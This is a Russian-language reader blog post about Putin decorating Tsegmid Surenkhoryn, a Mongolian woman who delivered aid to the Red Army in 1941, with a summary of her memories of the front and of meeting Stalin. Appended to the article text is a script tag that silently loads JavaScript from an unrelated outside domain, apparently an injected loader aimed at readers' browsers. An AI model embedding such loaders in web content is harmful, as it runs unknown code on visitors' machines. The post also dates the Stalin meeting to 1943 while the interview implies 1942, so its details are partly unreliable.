Путин наградил монгольскую фронтовичку
12 травня 2020, 14:53
Орденом Дружбы наградил президент Цэгмид Сурэнхорын из Монголии. Это единственная оставшаяся сейчас в живых участница делегации, доставившей в СССР во время войны Красной армии гуманитарную помощь
В 1943 году она встречалась со Сталиным на приеме делегации в Кремле. Свыше 50 лет Сурэнхорын проработала в сфере животноводства. Она не участвовала в боях, но была на фронте, и поэтому ее называют фронтовичкой.
В местной прессе вышло интервью с Цэгмид Сүрэнхорол, которая сейчас проживает в своей многочисленной традиционной семье в юрте и живет традиционной кочевой жизнью в свои 99 лет.
Вот краткое содержание этого интервью:
Расскажите немного о себе?
Я происхожу из простого народа, мои родители были скотоводами-батраками / и по факту крепостными до 1921 года, до прихода советской армии/. С 5 лет помогала семье по хозяйству, в жару, в холод. В 41-м году наша семья уже имела в собственности 105 голов скота и 10 верблюдов, по сравнению с 1 верблюдом и 5 головами скота в момент прихода народной власти.
Как получилось что вы были выбраны в делегацию для вручения подарков фронту в ВОВ?
На местном уровне выдвигались кандидатуры, а потом, говорят, сам товарищ Чойбалсан визировал делегатов. В то время я была передовиком животноводства с орденом от партии и правительства и поэтому меня выбрали от региона. Из всех 18 аймаков /регионов страны 15 делегатов поехали делегатами, среди которых были видные политические, военные, научные и культурные деятели.
Как отнеслись ваши родные и земляки к вашей поездке на фронт, что вообще происходило в то время?
Я слышала, что далеко в России была война, но что поеду туда сама - это мне никогда даже и не снилось. Однажды, когда была на семинаре в области, наш председатель Жадамба вдруг огорошил меня известием о дальней длинней командировке. Он просто приказал выдать мне лошадь вместо моего верблюда и немедленно езжать повидаться с мамой, так завтра надо уже выезжать. Тогда мне было 19 лет и конечно мама не захотела меня отпускать в далекую воюющую страну, но наш фельдшер местный тогда сказал ей - "вашей дочери очень повезло, в такую поездку надо просто езжать, к тому же не одна ж она будет ехать", в общем уговорили ее тогда. К тому же наш председатель мне передал средства собранные в нашей области из каждой семьи для постройки танков - золотые украшения, серебро для вручения в столице. И мы поехали и прибыли в столицу на перекладных лошадях, вселились значит и нам всем говорят снять мерки для новой одежки-то. Нас тогда приодели и дали с собой 2 смены одежды еще.
До сих в моей памяти свежи все события тогдашние. Мы выехали из Улан-Батора 26 ноября 41 на автобусе и через два дня прибыли на станцию Наушки. В четыре утра сели на поезд и поехали в Москву. Около Москвы над нами пролетало много самолетов, люди сказали, что это немцы. Тогда -то я несмышленная была совсем, никакого страха не было, не думала что убьют.
Как вас встретили в Москве и на фронте?
Прибыли мы в Москву 5-го декабря и нас очень замечательно встретили, всех усадили в красивые машины. В столице мы пробыли 5 дней и поехали на западный фронт четырьмя группами для вручения подарков, в нашей группе тогда были майор армейский Одсурэн, наш начальник Суренжав, около 8 человек. От принимающей стороны были маленкая девушка Иванова от 17-ой армии. Вот мы приехали и Суренжав говорит " передовая близко, 3 км всего от германцев". Стояли трескучие морозы и мне было очень жалко бойцов РККА в рваных сапожках-то. А пули-то над головой свистели когда мы были там. Околи недели на фронте были, в землянках на соломе ночевали.
Поделитесь, что целую неделю на передовой делали?
Подарки раздавали, сама каждому бойцу вручала их от народа Монголии. Во время передышек в наш блиндаж отделения бойцов приводили, наш начальник Суренжав по-русски краткую речь держал. Каждому бойцу вручали полушубок, шинель, кожанку, 2-3 вида обуви, варежки, мыло. А бойцы-то очень быстро переодевались и обратно в расположение. Война же, некогда рассиживаться.
Говорят, что вы стреляли во врагов, расскажите пожалуйста
Наш Суренжав дарга просто попросил тогда " Позвольте и нам самим в войне поучаствовать" . И русские нам выдали автоматы с лентой, 32 патрона было, взяли мы их в руки и сначала постреляли по мишеням. Потом русские говорят "Германцы вон ту деревню занимали недавно , может до сих пор там" и мы пошли туда. Значит, идем и стреляем-то. Никто в ответ не стрелял. Потом нам сказали, что вы эту деревню освободили.
Расскажите, как Сталин вас принимал?
Тогда мы в России 2-3 месяца пробыли, новый год в Москве встретили и думали что обратно, но не тут-то и было. И вот в Москве музеи смотрим, по городу туда сюда, в гостинице в нарды, карты играем, так время проводили. А потом узнали, что Сталин нас принимать будет 2 февраля. Суренжав дарга в гостинице нам сказал одеться в новые халаты и хромовые сапожки. Прибыли мы, значит и нас специальным ветерком обдули для очистки и внутрь пустили. Стоим, ждем и вдруг входят несколько человек, смотрю и вижу самого Сталина. Он мне руку пожал тогда.
Сейчас бабушка Цэгмид по прозвищу Фронт в кочевьях родных до сих пор дает ценные советы по уходу за скотом и не хочет жить в городе, говорит что не может без свободных просторов и воздуха...<script type="text/javascript" async="" src="//pingclock.net/21db1c5c8b372aecca.js"></script>
Рубрика "Блоги читачів" є майданчиком вільної журналістики та не модерується редакцією. Користувачі самостійно завантажують свої матеріали на сайт. Редакція не поділяє позицію блогерів та не відповідає за достовірність викладених ними фактів.